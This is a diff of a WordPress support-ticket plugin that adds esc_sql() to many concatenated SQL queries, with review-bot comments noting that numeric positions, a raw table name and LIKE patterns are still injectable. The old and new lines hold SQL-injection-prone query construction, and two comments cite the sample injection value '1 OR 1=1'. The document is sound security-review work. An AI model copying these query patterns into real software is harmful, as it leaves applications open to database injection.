         if (jssupportticket::$_db->last_error != null) {
@@ -76,7 +76,7 @@
     }

     function storeDesktopNotificationLogo($filename) {
-        jssupportticket::$_db->query("UPDATE `" . jssupportticket::$_db->prefix . "js_ticket_config` SET configvalue = '" . $filename . "' WHERE configname = 'logo_for_desktop_notfication_url' ");
+        jssupportticket::$_db->query("UPDATE `" . jssupportticket::$_db->prefix . "js_ticket_config` SET configvalue = '" . esc_sql($filename) . "' WHERE configname = 'logo_for_desktop_notfication_url' ");
     }

     function deleteDesktopNotificationsLogo() {
@@ -147,7 +147,7 @@
                     continue;
                 }
                 $value = jssupportticketphplib::JSST_str_replace(' ', '-', $value);
-                $query = 'SELECT COUNT(ID) FROM `'.jssupportticket::$_db->prefix.'posts` WHERE post_name = "'.$value.'"';
+                $query = 'SELECT COUNT(ID) FROM `'.jssupportticket::$_db->prefix.'posts` WHERE post_name = "'.esc_sql($value).'"';
                 $countslug = jssupportticket::$_db->get_var($query);
                 if($countslug >= 1){
                     JSSTmessage::setMessage(esc_html(__('System slug is conflicted with post or page slug.', 'js-support-ticket')), 'error');
@@ -316,7 +316,7 @@

     function genearateCronKey() {
         $key = jssupportticketphplib::JSST_md5(date('Y-m-d'));
-        $query = "UPDATE `".jssupportticket::$_db->prefix."js_ticket_config` SET configvalue = '".$key."' WHERE configname = 'ck'" ;
+        $query = "UPDATE `".jssupportticket::$_db->prefix."js_ticket_config` SET configvalue = '".esc_sql($key)."' WHERE configname = 'ck'" ;
         jssupportticket::$_db->query($query);
         return true;
     }
@@ -332,7 +332,7 @@
     }

     function getConfigValue($configname){
-        $query = "SELECT configvalue FROM `".jssupportticket::$_db->prefix."js_ticket_config` WHERE configname = '".$configname."'";
+        $query = "SELECT configvalue FROM `".jssupportticket::$_db->prefix."js_ticket_config` WHERE configname = '".esc_sql($configname)."'";
         $configvalue = jssupportticket::$_db->get_var($query);
         return $configvalue;
     }
@@ -365,7 +365,7 @@

     function getConfigurationByConfigName($configname) {
         $query = "SELECT configvalue
-                  FROM  `".jssupportticket::$_db->prefix."js_ticket_config` WHERE configname ='" . $configname . "'";
+                  FROM  `".jssupportticket::$_db->prefix."js_ticket_config` WHERE configname ='" . esc_sql($configname) . "'";
         $result = jssupportticket::$_db->get_var($query);
         return $result;
     }
--- a/js-support-ticket/modules/configuration/tpls/admin_configurations.php
+++ b/js-support-ticket/modules/configuration/tpls/admin_configurations.php
@@ -826,7 +826,7 @@
                       JSST_printConfigFieldSingle($title, $field, $description, $video, '', $videotext);
                     }

-                   if(isset(jssupportticket::$_data[0]['reopen_ticket_within_days'])){
+                    if(isset(jssupportticket::$_data[0]['reopen_ticket_within_days'])){
                       $title = esc_html(__('Reopen ticket within days', 'js-support-ticket'));
                       $field = JSSTformfield::text('reopen_ticket_within_days', jssupportticket::$_data[0]['reopen_ticket_within_days'], array('class' => 'inputbox'));
                       $description =  esc_html(__('The ticket can be reopened within a given number of days', 'js-support-ticket'));
--- a/js-support-ticket/modules/department/model.php
+++ b/js-support-ticket/modules/department/model.php
@@ -16,7 +16,7 @@
         $departmentname = jssupportticket::parseSpaces($departmentname);
         $inquery = '';
         if ($departmentname != null)
-            $inquery .= " WHERE department.departmentname LIKE '%".$departmentname."%'";
+            $inquery .= " WHERE department.departmentname LIKE '%".esc_sql($departmentname)."%'";

         jssupportticket::$_data['filter'][$deptname] = $departmentname;
         jssupportticket::$_data['filter']['pagesize'] = $pagesize;
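Review bot: on the `+` line `$departmentname` is inserted into a `LIKE '%...%'` pattern; esc_sql() escapes quotes but leaves `%` and `_` as LIKE wildcards, so a search term containing either still changes what the pattern matches. Run the value through `$wpdb->esc_like()` before esc_sql(), or bind it with `$wpdb->prepare('... LIKE %s', '%' . $wpdb->esc_like($departmentname) . '%')`.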
@@ -51,7 +51,7 @@
             $query = "SELECT department.*,email.email AS outgoingemail
                         FROM `" . jssupportticket::$_db->prefix . "js_ticket_departments` AS department
                         JOIN `" . jssupportticket::$_db->prefix . "js_ticket_email` AS email ON email.id = department.emailid
-                        WHERE department.id = " . $id;
+                        WHERE department.id = " . esc_sql($id);
             jssupportticket::$_data[0] = jssupportticket::$_db->get_row($query);
             if (jssupportticket::$_db->last_error != null) {
                 JSSTincluder::getJSModel('systemerror')->addSystemError(); // if there is an error add it to system errorrs
@@ -87,7 +87,7 @@
                 $emailaddresses = array();
             }
             $query = "SELECT email FROM `" . jssupportticket::$_db->prefix . "js_ticket_email`
-                WHERE id = ".$data['emailid'];
+                WHERE id = ".esc_sql($data['emailid']);
             $email = jssupportticket::$_db->get_var($query);

             foreach ($emailaddresses as $edata) {
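Review bot: $data['emailid'] at WHERE id = ... is still injected as a bare number, so esc_sql() is not the right tool here; there is no quote for it to escape. Use absint( $data['emailid'] ), or %d via $wpdb->prepare(), so that only an integer can reach the query.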
@@ -154,7 +154,7 @@
             $order = "<";
             $direction = "DESC";
         }
-        $query = "SELECT t.ordering,t.id,t2.ordering AS ordering2 FROM `" . jssupportticket::$_db->prefix . "js_ticket_departments` AS t,`" . jssupportticket::$_db->prefix . "js_ticket_departments` AS t2 WHERE t.ordering $order t2.ordering AND t2.id = $id ORDER BY t.ordering $direction LIMIT 1";
+        $query = "SELECT t.ordering,t.id,t2.ordering AS ordering2 FROM `" . jssupportticket::$_db->prefix . "js_ticket_departments` AS t,`" . jssupportticket::$_db->prefix . "js_ticket_departments` AS t2 WHERE t.ordering $order t2.ordering AND t2.id = ".esc_sql($id)." ORDER BY t.ordering $direction LIMIT 1";
         $result = jssupportticket::$_db->get_row($query);

         $row = JSSTincluder::getJSTable('departments');
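Review bot: t2.id = ".esc_sql($id)." is an unquoted position, so a non-numeric $id still breaks out of the expression after this change; cast it with (int). $order and $direction are interpolated raw as well. That is fine as long as they are only ever assigned the literal "<" and "DESC" the visible branch shows, but a comment on those assignments saying so would stop the next maintainer from plumbing a request value through them.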
@@ -184,7 +184,7 @@
                 if(in_array('agent',jssupportticket::$_active_addons)){
                     $query = "DELETE
                                 FROM `".jssupportticket::$_db->prefix . "js_ticket_acl_role_access_departments`
-                                WHERE departmentid = ".$id;
+                                WHERE departmentid = ".esc_sql($id);
                     jssupportticket::$_db->query($query);
                 }
                 JSSTmessage::setMessage(esc_html(__('The department has been deleted', 'js-support-ticket')), 'updated');
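Review bot: the DELETE on js_ticket_acl_role_access_departments compares departmentid = ".esc_sql($id) in numeric context, where escaping changes nothing, and its query() call has no last_error check before JSSTmessage reports 'The department has been deleted'. Cast $id to int for the query and test jssupportticket::$_db->last_error after the call so that a failed ACL cleanup is reported rather than silently swallowed.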
@@ -202,19 +202,19 @@
         if (!is_numeric($id))
             return false;
         $query = "SELECT (
-                    (SELECT COUNT(id) FROM `" . jssupportticket::$_db->prefix . "js_ticket_tickets` WHERE departmentid = " . $id . ")
-                    + (SELECT COUNT(id) FROM `" . jssupportticket::$_db->prefix . "js_ticket_departments` WHERE id = " . $id . " AND isdefault = 1) ";
+                    (SELECT COUNT(id) FROM `" . jssupportticket::$_db->prefix . "js_ticket_tickets` WHERE departmentid = " . esc_sql($id) . ")
+                    + (SELECT COUNT(id) FROM `" . jssupportticket::$_db->prefix . "js_ticket_departments` WHERE id = " . esc_sql($id) . " AND isdefault = 1) ";

                     if(in_array('agent', jssupportticket::$_active_addons)){
-                        $query .= " + (SELECT COUNT(id) FROM `" . jssupportticket::$_db->prefix . "js_ticket_acl_user_access_departments` WHERE departmentid = " . $id . ") ";
+                        $query .= " + (SELECT COUNT(id) FROM `" . jssupportticket::$_db->prefix . "js_ticket_acl_user_access_departments` WHERE departmentid = " . esc_sql($id) . ") ";
                     }

                     if(in_array('helptopic', jssupportticket::$_active_addons)){
-                        $query .= " + (SELECT COUNT(id) FROM `" . jssupportticket::$_db->prefix . "js_ticket_help_topics` WHERE departmentid = " . $id . ") ";
+                        $query .= " + (SELECT COUNT(id) FROM `" . jssupportticket::$_db->prefix . "js_ticket_help_topics` WHERE departmentid = " . esc_sql($id) . ") ";
                     }

                     if(in_array('cannedresponses', jssupportticket::$_active_addons)){
-                        $query .= " + (SELECT COUNT(id) FROM `" . jssupportticket::$_db->prefix . "js_ticket_department_message_premade` WHERE departmentid = " . $id . ")";
+                        $query .= " + (SELECT COUNT(id) FROM `" . jssupportticket::$_db->prefix . "js_ticket_department_message_premade` WHERE departmentid = " . esc_sql($id) . ")";
                     }

                     $query .= " ) AS total";
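Review bot: this function already rejects non-numeric input with if (!is_numeric($id)) return false; at the top, so the five esc_sql($id) calls below it are no-ops on an already numeric value; they make the query harder to read without adding protection. Normalise once after the guard, $id = (int) $id;, and drop the per-subquery escaping.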
@@ -244,7 +244,7 @@
     function changeStatus($id) {
         if (!is_numeric($id))
             return false;
-        $query = "SELECT status  FROM `" . jssupportticket::$_db->prefix . "js_ticket_departments` WHERE id=" . $id;
+        $query = "SELECT status  FROM `" . jssupportticket::$_db->prefix . "js_ticket_departments` WHERE id=" . esc_sql($id);
            $status = jssupportticket::$_db->get_var($query);
        $status = 1 - $status;

@@ -262,10 +262,10 @@
         if (!is_numeric($id))
             return false;

-        $query = "UPDATE `" . jssupportticket::$_db->prefix . "js_ticket_departments` SET isdefault = 0 WHERE id != " . $id;
+        $query = "UPDATE `" . jssupportticket::$_db->prefix . "js_ticket_departments` SET isdefault = 0 WHERE id != " . esc_sql($id);
         jssupportticket::$_db->query($query);

-        $query = "UPDATE `" . jssupportticket::$_db->prefix . "js_ticket_departments` SET isdefault = 1 - $default WHERE id=" . $id;
+        $query = "UPDATE `" . jssupportticket::$_db->prefix . "js_ticket_departments` SET isdefault = 1 - $default WHERE id=" . esc_sql($id);
         jssupportticket::$_db->query($query);

         if (jssupportticket::$_db->last_error == null) {
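Review bot: $default is interpolated raw into SET isdefault = 1 - $default on both the old and the new line, so this hunk escapes $id but leaves the other caller-supplied value untouched. If $default can be anything other than 0 or 1 it needs the same treatment: (int) $default, or compute the new flag in PHP and pass it through $wpdb->prepare() as %d.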
@@ -291,7 +291,7 @@
             return false;
         }

-        $query = "SELECT id, topic AS text FROM `" . jssupportticket::$_db->prefix . "js_ticket_help_topics` WHERE status = 1 AND departmentid = " . $departmentid . " ORDER BY ordering ASC";
+        $query = "SELECT id, topic AS text FROM `" . jssupportticket::$_db->prefix . "js_ticket_help_topics` WHERE status = 1 AND departmentid = " . esc_sql($departmentid) . " ORDER BY ordering ASC";
         $list = jssupportticket::$_db->get_results($query);

         $query = "SELECT required FROM `" . jssupportticket::$_db->prefix . "js_ticket_fieldsordering` WHERE field='helptopic'";
@@ -315,7 +315,7 @@
         $departmentid = JSSTrequest::getVar('val');
         if (!is_numeric($departmentid))
             return false;
-        $query = "SELECT id, title AS text FROM `" . jssupportticket::$_db->prefix . "js_ticket_department_message_premade` WHERE status = 1 AND departmentid = " . $departmentid;
+        $query = "SELECT id, title AS text FROM `" . jssupportticket::$_db->prefix . "js_ticket_department_message_premade` WHERE status = 1 AND departmentid = " . esc_sql($departmentid);
         $list = jssupportticket::$_db->get_results($query);
         $combobox = false;
         $html = '';
@@ -344,7 +344,7 @@
     function getSignatureByID($id) {
         if (!is_numeric($id))
             return false;
-        $query = "SELECT departmentsignature FROM `" . jssupportticket::$_db->prefix . "js_ticket_departments` WHERE id = " . $id;
+        $query = "SELECT departmentsignature FROM `" . jssupportticket::$_db->prefix . "js_ticket_departments` WHERE id = " . esc_sql($id);
         $signature = jssupportticket::$_db->get_var($query);
         return $signature;
     }
@@ -352,7 +352,7 @@
     function getDepartmentById($id) {
         if (!is_numeric($id))
             return false;
-        $query = "SELECT departmentname FROM `" . jssupportticket::$_db->prefix . "js_ticket_departments` WHERE id = " . $id;
+        $query = "SELECT departmentname FROM `" . jssupportticket::$_db->prefix . "js_ticket_departments` WHERE id = " . esc_sql($id);
         $departmentname = jssupportticket::$_db->get_var($query);
         return $departmentname;
     }
--- a/js-support-ticket/modules/email/model.php
+++ b/js-support-ticket/modules/email/model.php
@@ -110,7 +110,7 @@
                                     FROM `".jssupportticket::$_db->prefix."js_ticket_tickets` AS ticket
                                     LEFT JOIN `".jssupportticket::$_db->prefix."js_ticket_departments` AS dept ON dept.id = ticket.departmentid
                                     LEFT JOIN `".jssupportticket::$_db->prefix."js_ticket_email` AS email ON email.id = dept.emailid
-                                    WHERE ticket.id = ".$id;
+                                    WHERE ticket.id = ".esc_sql($id);
                         $dept_result = jssupportticket::$_db->get_row($query);
                         if($dept_result){
                             if(isset($dept_result->sendmail) && $dept_result->sendmail == 1){
@@ -1879,19 +1879,19 @@
             $query = "SELECT mail.subject,mail.message,CONCAT(staff.firstname,' ',staff.lastname) AS sendername, staff.uid as staffuid
                         FROM `" . jssupportticket::$_db->prefix . "js_ticket_staff_mail` AS mail
                         JOIN `" . jssupportticket::$_db->prefix . "js_ticket_staff` AS staff ON staff.id = mail.fromid
-                        WHERE mail.id = " . $id;
+                        WHERE mail.id = " . esc_sql($id);
         } else {
             $query = "SELECT mail.subject,reply.message,CONCAT(staff.firstname,' ',staff.lastname) AS sendername, staff.uid as staffuid
                         FROM `" . jssupportticket::$_db->prefix . "js_ticket_staff_mail` AS reply
                         JOIN `" . jssupportticket::$_db->prefix . "js_ticket_staff_mail` AS mail ON mail.id = reply.replytoid
                         JOIN `" . jssupportticket::$_db->prefix . "js_ticket_staff` AS staff ON staff.id = reply.fromid
-                        WHERE reply.id = " . $id;
+                        WHERE reply.id = " . esc_sql($id);
         }
         $result = jssupportticket::$_db->get_row($query);
             $query = "SELECT staff.email
                         FROM `" . jssupportticket::$_db->prefix . "js_ticket_staff_mail` AS mail
                         JOIN `" . jssupportticket::$_db->prefix . "js_ticket_staff` AS staff ON staff.id = mail.toid
-                        WHERE mail.id = " . $id;
+                        WHERE mail.id = " . esc_sql($id);
         $email = jssupportticket::$_db->get_var($query);
         $result->receveremail = $email;
         return $result;
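Review bot: $result->receveremail = $email at the end of this hunk dereferences whatever get_row() returned, and for an $id that matches nothing that is null, which on PHP 8 is a fatal "Attempt to assign property on null". Add if ( ! $result ) return false; before the assignment. The three WHERE ... id = " . esc_sql($id) comparisons are unquoted numeric positions as well, so esc_sql() does not restrict what $id can contain there; cast to int.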
@@ -1902,7 +1902,7 @@
             return false;
         $query = "SELECT staff.email
                     FROM `" . jssupportticket::$_db->prefix . "js_ticket_staff` AS staff
-                    WHERE staff.id = $id";
+                    WHERE staff.id = " . esc_sql($id);
         $emailaddress = jssupportticket::$_db->get_var($query);
         return $emailaddress;
     }
@@ -1912,7 +1912,7 @@
             return false;
         $query = "SELECT staff.uid
                     FROM `" . jssupportticket::$_db->prefix . "js_ticket_staff` AS staff
-                    WHERE staff.id = $id";
+                    WHERE staff.id = " . esc_sql($id);
         $emailaddress = jssupportticket::$_db->get_var($query);
         return $emailaddress;
     }
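Review bot: the query now selects staff.uid but the result is still stored and returned as $emailaddress, a copy-paste leftover from the function above it. Rename it to $uid so the variable matches what callers receive. The early return false; at the top of the hunk indicates the id is already validated as numeric, in which case (int) $id says what is meant more clearly than esc_sql($id).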
@@ -1920,7 +1920,7 @@
     private function getLatestReplyByTicketId($id) {
         if (!is_numeric($id))
             return false;
-        $query = "SELECT reply.message FROM `" . jssupportticket::$_db->prefix . "js_ticket_replies` AS reply WHERE reply.ticketid = " . $id . " ORDER BY reply.created DESC LIMIT 1";
+        $query = "SELECT reply.message FROM `" . jssupportticket::$_db->prefix . "js_ticket_replies` AS reply WHERE reply.ticketid = " . esc_sql($id) . " ORDER BY reply.created DESC LIMIT 1";
         $message = jssupportticket::$_db->get_var($query);
         if (jssupportticket::$_db->last_error != null) {
             JSSTincluder::getJSModel('systemerror')->addSystemError();
@@ -2012,7 +2012,7 @@
                         FROM `" . jssupportticket::$_db->prefix . "js_ticket_tickets` AS ticket
                         JOIN `" . jssupportticket::$_db->prefix . "js_ticket_departments` AS department ON department.id = ticket.departmentid
                         JOIN `" . jssupportticket::$_db->prefix . "js_ticket_email` AS email ON email.id = department.emailid
-                        WHERE ticket.id = " . $id;
+                        WHERE ticket.id = " . esc_sql($id);
             $email = jssupportticket::$_db->get_row($query);
             if (jssupportticket::$_db->last_error != null) {
                 JSSTincluder::getJSModel('systemerror')->addSystemError();
@@ -2028,13 +2028,13 @@

     private function getDefaultSenderEmailAndName() {
         $emailid = jssupportticket::$_config['default_alert_email'];
-        $query = "SELECT email,name FROM `" . jssupportticket::$_db->prefix . "js_ticket_email` WHERE id = " . $emailid;
+        $query = "SELECT email,name FROM `" . jssupportticket::$_db->prefix . "js_ticket_email` WHERE id = " . esc_sql($emailid);
         $email = jssupportticket::$_db->get_row($query);
         return $email;
     }

     private function getTemplateForEmail($templatefor) {
-        $query = "SELECT * FROM `" . jssupportticket::$_db->prefix . "js_ticket_emailtemplates` WHERE templatefor = '" . $templatefor . "'";
+        $query = "SELECT * FROM `" . jssupportticket::$_db->prefix . "js_ticket_emailtemplates` WHERE templatefor = '" . esc_sql($templatefor) . "'";
         $template = jssupportticket::$_db->get_row($query);
         if (jssupportticket::$_db->last_error != null) {
             JSSTincluder::getJSModel('systemerror')->addSystemError();
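Review bot: the two escapes in this hunk are not equivalent. templatefor = '" . esc_sql($templatefor) . "' is a quoted string position, where esc_sql() is the right call. id = " . esc_sql($emailid) is an unquoted numeric position, where it changes nothing: a stored config value of 1 OR 1=1 would still pass through. Cast $emailid to int, so that one bad config row cannot turn into a query that returns an arbitrary email record.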
@@ -2053,11 +2053,11 @@
                     . " LEFT JOIN `" . jssupportticket::$_db->prefix . "js_ticket_departments` AS department ON department.id = ticket.departmentid "
                     . jssupportticket::$_addon_query['join']
                     . " LEFT JOIN `" . jssupportticket::$_db->prefix . "js_ticket_priorities` AS priority ON priority.id = ticket.priorityid "
-                    . " WHERE ticket.id = " . $id;
+                    . " WHERE ticket.id = " . esc_sql($id);
                 do_action('reset_jsst_aadon_query');
             break;
             default:
-                $query = "SELECT * FROM `" . jssupportticket::$_db->prefix . $tablename . "` WHERE id = " . $id;
+                $query = "SELECT * FROM `" . jssupportticket::$_db->prefix . $tablename . "` WHERE id = " . esc_sql($id);
             break;
         }
         $record = jssupportticket::$_db->get_row($query);
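Review bot: $tablename is concatenated into the table identifier in the default branch, "SELECT * FROM `" . prefix . $tablename . "` WHERE id = ...", with no escaping, and esc_sql() could not protect it anyway since identifiers are not quoted-string escapable. If $tablename is chosen by the caller it must be matched against an allow-list of the plugin's table suffixes before this switch. The esc_sql($id) in the numeric position is the same (int) cast issue as in the other lookups.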
@@ -2072,7 +2072,7 @@
         $email = jssupportticket::$_search['email']['email'];
         $inquery = '';
         if ($email != null)
-            $inquery .= " WHERE email.email LIKE '%$email%'";
+            $inquery .= " WHERE email.email LIKE '%".esc_sql($email)."%'";

         jssupportticket::$_data['filter']['email'] = $email;
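Review bot: LIKE '%".esc_sql($email)."%' escapes quotes but not the LIKE metacharacters, so a search for % or _ still behaves as a wildcard. Wrap the value in $wpdb->esc_like() before esc_sql(), or use $wpdb->prepare() with %s and build the pattern as '%' . $wpdb->esc_like( $email ) . '%'.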

@@ -2111,7 +2111,7 @@
                 return false;
             $query = "SELECT email.id, email.email, email.autoresponse, email.created, email.updated,email.status,email.smtpemailauth,email.smtphosttype,email.smtphost,email.smtpauthencation,email.name,email.password,email.smtpsecure,email.mailport
                         FROM `" . jssupportticket::$_db->prefix . "js_ticket_email` AS email
-                        WHERE email.id = " . $id;
+                        WHERE email.id = " . esc_sql($id);
             jssupportticket::$_data[0] = jssupportticket::$_db->get_row($query);
             if(isset(jssupportticket::$_data[0]->password) && jssupportticket::$_data[0]->password != ''){
                 jssupportticket::$_data[0]->password = jssupportticketphplib::JSST_safe_decoding(jssupportticket::$_data[0]->password);
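Review bot: the row selected here includes email.password, and the lines right after get_row() decode it with JSST_safe_decoding() into jssupportticket::$_data[0], the same structure the views render from. Whatever template consumes $_data[0] therefore has the SMTP credential in the clear. Load the password only where the edit form actually needs it and keep it out of the shared data array otherwise. The esc_sql($id) change is redundant with the early return false; that precedes the query.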
@@ -2162,7 +2162,7 @@
     }

     function checkAlreadyExist($email){
-        $query = "SELECT COUNT(id) FROM`" . jssupportticket::$_db->prefix . "js_ticket_email`  WHERE email = '".$email."'";
+        $query = "SELECT COUNT(id) FROM`" . jssupportticket::$_db->prefix . "js_ticket_email`  WHERE email = '".esc_sql($email)."'";
         $result = jssupportticket::$_db->get_var($query);
         if($result > 0)
             return true;
@@ -2191,9 +2191,9 @@
         if (!is_numeric($id))
             return false;
         $query = "SELECT (
-                        (SELECT COUNT(id) FROM `" . jssupportticket::$_db->prefix . "js_ticket_departments` WHERE emailid = " . $id . ")
-                        + (SELECT COUNT(*) FROM `" . jssupportticket::$_db->prefix . "js_ticket_config` WHERE configname = 'default_alert_email' AND configvalue = " . $id . ")
-                        + (SELECT COUNT(*) FROM `" . jssupportticket::$_db->prefix . "js_ticket_config` WHERE configname = 'default_admin_email' AND configvalue = " . $id . ")
+                        (SELECT COUNT(id) FROM `" . jssupportticket::$_db->prefix . "js_ticket_departments` WHERE emailid = " . esc_sql($id) . ")
+                        + (SELECT COUNT(*) FROM `" . jssupportticket::$_db->prefix . "js_ticket_config` WHERE configname = 'default_alert_email' AND configvalue = " . esc_sql($id) . ")
+                        + (SELECT COUNT(*) FROM `" . jssupportticket::$_db->prefix . "js_ticket_config` WHERE configname = 'default_admin_email' AND configvalue = " . esc_sql($id) . ")
                         ) AS total";
         $result = jssupportticket::$_db->get_var($query);
         if (jssupportticket::$_db->last_error != null) {
@@ -2217,7 +2217,7 @@
     function getEmailById($id) {
         if (!is_numeric($id))
             return false;
-        $query = "SELECT email  FROM `" . jssupportticket::$_db->prefix . "js_ticket_email` WHERE id = " . $id;
+        $query = "SELECT email  FROM `" . jssupportticket::$_db->prefix . "js_ticket_email` WHERE id = " . esc_sql($id);
         $email = jssupportticket::$_db->get_var($query);
         if (jssupportticket::$_db->last_error != null) {
             JSSTincluder::getJSModel('systemerror')->addSystemError();
@@ -2231,7 +2231,7 @@
         }
         if(!is_string($senderemail))
             return false;
-        $query = "SELECT COUNT(id) FROM `" . jssupportticket::$_db->prefix . "js_ticket_email` WHERE email = '".$senderemail. "' AND smtpemailauth = 1"; // 1 For smtp 0 for default
+        $query = "SELECT COUNT(id) FROM `" . jssupportticket::$_db->prefix . "js_ticket_email` WHERE email = '".esc_sql($senderemail). "' AND smtpemailauth = 1"; // 1 For smtp 0 for default
         $total = jssupportticket::$_db->get_var($query);
         if($total > 0){
             return true;
@@ -2241,7 +2241,7 @@
     }

     function getSMTPEmailConfig($senderemail){
-        $query = "SELECT * FROM  `" . jssupportticket::$_db->prefix . "js_ticket_email` WHERE email = '".$senderemail."'";
+        $query = "SELECT * FROM  `" . jssupportticket::$_db->prefix . "js_ticket_email` WHERE email = '".esc_sql($senderemail)."'";
         $emailconfig = jssupportticket::$_db->get_row($query);
         return $emailconfig;
     }
@@ -2316,7 +2316,7 @@
             $query = "SELECT replies.*,replies.id AS replyid,tickets.id
                     FROM `" . jssupportticket::$_db->prefix . "js_ticket_replies` AS replies
                     JOIN `" . jssupportticket::$_db->prefix . "js_ticket_tickets` AS tickets ON  replies.ticketid = tickets.id
-                    WHERE tickets.id = " . $id . " ORDER By replies.id DESC";
+                    WHERE tickets.id = " . esc_sql($id) . " ORDER By replies.id DESC";
             $replies = jssupportticket::$_db->get_results($query);
             foreach ($replies as $key => $reply) {
                 if ($key == 0) {
--- a/js-support-ticket/modules/emailtemplate/model.php
+++ b/js-support-ticket/modules/emailtemplate/model.php
@@ -64,7 +64,7 @@
             default: $tempatefor = 'ticket-new';
                 break;
         }
-        $query = "SELECT * FROM `" . jssupportticket::$_db->prefix . "js_ticket_emailtemplates` WHERE templatefor = '" . $tempatefor . "'";
+        $query = "SELECT * FROM `" . jssupportticket::$_db->prefix . "js_ticket_emailtemplates` WHERE templatefor = '" . esc_sql($tempatefor) . "'";
         jssupportticket::$_data[0] = jssupportticket::$_db->get_row(($query));
         if (jssupportticket::$_db->last_error != null) {
             JSSTincluder::getJSModel('systemerror')->addSystemError();
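Review bot: $tempatefor is assigned only from string literals in the switch above (the visible default branch sets 'ticket-new'), so esc_sql() here is harmless but unnecessary; the cleanup worth making is the misspelled variable name, which should be $templatefor to match the column and the rest of the module. If the line is touched anyway, prepare it with %s so the pattern is uniform with the other template lookups.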
@@ -102,7 +102,7 @@
             die( 'Security check Failed' );
         }
         $templatefor = JSSTrequest::getVar('templatefor');
-        $query = "SELECT * FROM `" . jssupportticket::$_db->prefix . "js_ticket_emailtemplates` WHERE templatefor = '" . $templatefor . "'";
+        $query = "SELECT * FROM `" . jssupportticket::$_db->prefix . "js_ticket_emailtemplates` WHERE templatefor = '" . esc_sql($templatefor) . "'";
         $result = jssupportticket::$_db->get_row($query);
         $data =  array('defaultsubject'=>htmlentities($result->subject),'defaultbody'=>htmlentities($result->body) , 'defaultid'=>htmlentities($result->id));
         return json_encode($data);
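Review bot: $templatefor comes straight from JSSTrequest::getVar() and lands in a quoted string position, so esc_sql() does the job here, but $result->subject on the line after get_row() is not guarded: an unknown templatefor yields null and the three htmlentities() calls then read properties of null. Return an error JSON when $result is empty, and prefer $wpdb->prepare( "... WHERE templatefor = %s", $templatefor ) over manual escaping.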
--- a/js-support-ticket/modules/fieldordering/model.php
+++ b/js-support-ticket/modules/fieldordering/model.php
@@ -11,7 +11,7 @@
         }
 	$formid = jssupportticket::$_data['formid'];
         if (isset($formid) && $formid != null) {
-            $inquery = " AND multiformid = ".$formid;
+            $inquery = " AND multiformid = ".esc_sql($formid);
         }
     	else{
             $inquery = " AND multiformid = ".JSSTincluder::getJSModel('ticket')->getDefaultMultiFormId();
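Review bot: multiformid = ".esc_sql($formid) is an unquoted numeric position, so esc_sql() leaves a value like 1 OR 1=1 unchanged. $formid is read from jssupportticket::$_data['formid'] with only an isset/null check visible, so cast it: " AND multiformid = " . (int) $formid.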
@@ -26,7 +26,7 @@

         // Data
 //        $query = "SELECT * FROM `".jssupportticket::$_db->prefix."js_ticket_fieldsordering` WHERE published = 1 AND fieldfor = 1 ORDER BY ordering LIMIT ".JSSTpagination::getOffset().", ".JSSTpagination::getLimit();
-        $query = "SELECT * FROM `" . jssupportticket::$_db->prefix . "js_ticket_fieldsordering` WHERE fieldfor = ".$fieldfor;
+        $query = "SELECT * FROM `" . jssupportticket::$_db->prefix . "js_ticket_fieldsordering` WHERE fieldfor = ".esc_sql($fieldfor);
         $query .= $inquery." ORDER BY ordering ";

         jssupportticket::$_data[0] = jssupportticket::$_db->get_results($query);
@@ -40,14 +40,14 @@
         if (!is_numeric($id))
             return false;
         if ($status == 'publish') {
-            $query = "UPDATE `" . jssupportticket::$_db->prefix . "js_ticket_fieldsordering` SET published = 1 WHERE id = " . $id . " AND cannotunpublish = 0";
+            $query = "UPDATE `" . jssupportticket::$_db->prefix . "js_ticket_fieldsordering` SET published = 1 WHERE id = " . esc_sql($id) . " AND cannotunpublish = 0";
             jssupportticket::$_db->query($query);
             if (jssupportticket::$_db->last_error != null) {
                 JSSTincluder::getJSModel('systemerror')->addSystemError();
             }
             JSSTmessage::setMessage(esc_html(__('Field mark as published', 'js-support-ticket')),'updated');
         } elseif ($status == 'unpublish') {
-            $query = "UPDATE `" . jssupportticket::$_db->prefix . "js_ticket_fieldsordering` SET published = 0 WHERE id = " . $id . " AND cannotunpublish = 0";
+            $query = "UPDATE `" . jssupportticket::$_db->prefix . "js_ticket_fieldsordering` SET published = 0 WHERE id = " . esc_sql($id) . " AND cannotunpublish = 0";
             jssupportticket::$_db->query($query);
             if (jssupportticket::$_db->last_error != null) {
                 JSSTincluder::getJSModel('systemerror')->addSystemError();
@@ -61,12 +61,12 @@
         if (!is_numeric($id))
             return false;
         if ($status == 'publish') {
-            $query = "SELECT userfieldtype FROM " . jssupportticket::$_db->prefix . "js_ticket_fieldsordering WHERE id = " . $id;
+            $query = "SELECT userfieldtype FROM " . jssupportticket::$_db->prefix . "js_ticket_fieldsordering WHERE id = " . esc_sql($id);
             $userfieldtype = jssupportticket::$_db->get_var($query);
             if($userfieldtype == 'admin_only'){
                 JSSTmessage::setMessage(esc_html(__('Field cannot be mark as published', 'js-support-ticket')),'error');
             }else{
-                $query = "UPDATE `" . jssupportticket::$_db->prefix . "js_ticket_fieldsordering` SET isvisitorpublished = 1 WHERE id = " . $id . " AND cannotunpublish = 0";
+                $query = "UPDATE `" . jssupportticket::$_db->prefix . "js_ticket_fieldsordering` SET isvisitorpublished = 1 WHERE id = " . esc_sql($id) . " AND cannotunpublish = 0";
                 jssupportticket::$_db->query($query);
                 if (jssupportticket::$_db->last_error != null) {
                     JSSTincluder::getJSModel('systemerror')->addSystemError();
@@ -74,7 +74,7 @@
                 JSSTmessage::setMessage(esc_html(__('Field mark as published', 'js-support-ticket')),'updated');
             }
         } elseif ($status == 'unpublish') {
-            $query = "UPDATE `" . jssupportticket::$_db->prefix . "js_ticket_fieldsordering` SET isvisitorpublished = 0 WHERE id = " . $id . " AND cannotunpublish = 0";
+            $query = "UPDATE `" . jssupportticket::$_db->prefix . "js_ticket_fieldsordering` SET isvisitorpublished = 0 WHERE id = " . esc_sql($id) . " AND cannotunpublish = 0";
             jssupportticket::$_db->query($query);
             if (jssupportticket::$_db->last_error != null) {
                 JSSTincluder::getJSModel('systemerror')->addSystemError();
@@ -88,23 +88,23 @@
         if (!is_numeric($id))
             return false;

-        // $query = "SELECT field FROM `".jssupportticket::$_db->prefix."js_ticket_fieldsordering` WHERE id =".$id;
+        // $query = "SELECT field FROM `".jssupportticket::$_db->prefix."js_ticket_fieldsordering` WHERE id =".esc_sql($id);
         // $child = jssupportticket::$_db->get_var($query);
-        // $query = "SELECT count(id) FROM `".jssupportticket::$_db->prefix."js_ticket_fieldsordering` WHERE visible_field = '".$child."'";
